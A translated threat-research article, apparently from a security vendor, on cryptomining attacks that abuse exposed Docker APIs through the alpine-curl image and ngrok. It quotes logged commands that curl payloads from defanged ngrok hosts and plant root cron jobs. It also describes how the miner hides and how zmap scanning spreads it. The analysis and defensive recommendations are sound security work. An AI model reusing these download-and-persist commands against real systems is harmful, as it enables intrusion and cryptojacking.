We analyzed the data collected using honeypots - they were created by us to track threats. And we have detected significant activity from unwanted or unauthorized cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.
Additionally, networking programs are installed to penetrate open neighboring containers and applications.
We leave our honeypots as they are, that is, with the default settings, without any security measures or the subsequent installation of additional software. Please note that Docker has recommendations for initial setup in order to avoid errors and simple vulnerabilities. But the honeypots used are containers designed to detect attacks against the containerization platform, not the applications inside the containers.
The detected malicious activity is also remarkable in that it does not require the presence of vulnerabilities, and is also independent of the Docker version. Finding a misconfigured and therefore open container image is all that attackers need to infect many open servers.
The unclosed Docker API allows the user to perform a wide range of , including getting a list of running containers, getting logs from a specific container, starting, stopping (including forced) and even creating a new container from a specific image with specified settings.
On the left is the malware delivery method. On the right is the attacker's environment, which allows remote image rolling.
Country breakdown of 3762 open Docker APIs. Based on Shodan search on 12.02.2019/XNUMX/XNUMX
Attack chain and payload variants
Malicious activity was detected not only with the help of honeypots. Data from Shodan shows that the number of exposed Docker APIs (see second graph) has increased since we investigated a misconfigured container used as a bridge to deploy Monero cryptocurrency mining software. In October last year (2018, current data approx. translator) there were only 856 open APIs.
An examination of the honeypots logs showed that the use of a container image is also associated with the use of , a tool for establishing secure connections or forwarding traffic from publicly accessible points to specified addresses or resources (for example, localhost). This allows attackers to dynamically create URLs when delivering a payload to an open server. Below are code examples from the logs showing abuse of the ngrok service:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”As you can see, the uploaded files are downloaded from constantly changing URLs. These URLs have a short expiration date, so payloads cannot be loaded after the expiration date.
There are two payload options. The first is a compiled Linux ELF miner (identified as Coinminer.SH.MALXMR.ATNO) that connects to the mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to obtain certain network tools used to scan network ranges and then search for new targets.
The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are located, and the RIP variable is the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.
Examples of HOST and RIP variables, as well as a snippet of code used as a check that no other miners are running
Before starting the miner, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that may be present in Linux environments. This is usually enough to bypass checks against the list of running processes.
The search script also has features. It works with the same URL service to deploy the required tools. Among them is the zmap binary, which is used to scan networks and get a list of open ports. The script also loads another binary used to interact with the found services and receive banners from them to determine additional information about the found service (for example, its version).
The script also predefines some network ranges for scanning, but this depends on the version of the script. It also sets target ports from services - in this case Docker - before starting the scan.
As soon as possible targets are found, banners are automatically removed from them. The script also filters targets depending on the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, , Docker client 1.16 and Apache CouchDB. If the server being scanned matches any of them, it is saved in a text file that attackers can later use for further analysis and hacking. These text files are downloaded to attackers' servers via dynamic links. That is, a separate URL is used for each file, which means difficulties in subsequent access.
The attack vector is a Docker image, as can be seen in the next two pieces of code.
Above - renaming to a legitimate service, and below - how zmap is used to scan networks
At the top are predefined network ranges, at the bottom are specific ports for searching for services, including Docker
The screenshot shows that the alpine-curl image has been downloaded over 10 million times.
Based on Alpine Linux and curl, a resource-efficient CLI tool for transferring files over various protocols, you can build . As you can see in the previous figure, this image has already been downloaded more than 10 million times. A large number of downloads may mean using this image as an entry point, this image was updated more than six months ago, users did not download other images in this repository as often. In Docker - a set of instructions used to configure a container to run it. If the entry point settings are incorrect (for example, the container is left open from the Internet), the image can be used as an attack vector. Attackers can use it to deliver a payload if they find a misconfigured or open container left unsupported.
It is important to note that this image (alpine-curl) is not malicious in itself, but as you can see above, it can perform malicious functions. Similar Docker images can also be used for malicious purposes. We have contacted Docker and have been working with them on this issue.
Recommendations
remains for many companies, especially those implementing , focused on rapid development and delivery. Everything is exacerbated by the need to comply with the rules of auditing, monitoring, the need to monitor the confidentiality of data, as well as the huge damage from their non-compliance. Incorporating security automation into the development lifecycle not only helps you find security holes that might otherwise go unnoticed, but it also reduces unnecessary workload, such as running additional software builds for every vulnerability or misconfiguration that is discovered after an application is deployed.
The incident discussed in this article highlights the need to take safety into account from the start, including the following recommendations:
- For system administrators and developers: Always check your API settings to make sure everything is configured to only accept requests from a specific server or internal network.
- Follow the principle of least rights: check that container images are signed and verified, restrict access to critical components (container launcher service), and add network connection encryption.
- Follow and enable security mechanisms like and built-in .
- Use automated runtime and image scanning to obtain additional information about the processes running in the container (for example, to detect spoofing or find vulnerabilities). Application Control and Integrity Monitoring help track anomalous changes to servers, files, and system areas.
Trendmicro helps DevOps teams build securely, roll out quickly, and run anywhere. Trend Micro delivers powerful, streamlined, and automated security across an organization's DevOps pipeline and provides multiple ways to protect against threats to protect physical, virtual and cloud workloads at runtime. It also adds container protection with и , which scan Docker container images for malware and vulnerabilities at any interval in the development pipeline to prevent threats before they are deployed.
Signs of compromise
Related hashes:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
On the Practicing speakers show what settings need to be made first in order to minimize the likelihood or completely avoid the occurrence of the situation described above. And on August 19-21 at an online intensive You can discuss these and similar security problems with colleagues and practicing teachers at a round table, where everyone can speak out and listen to the pains and successes of experienced colleagues.
Source: habr.com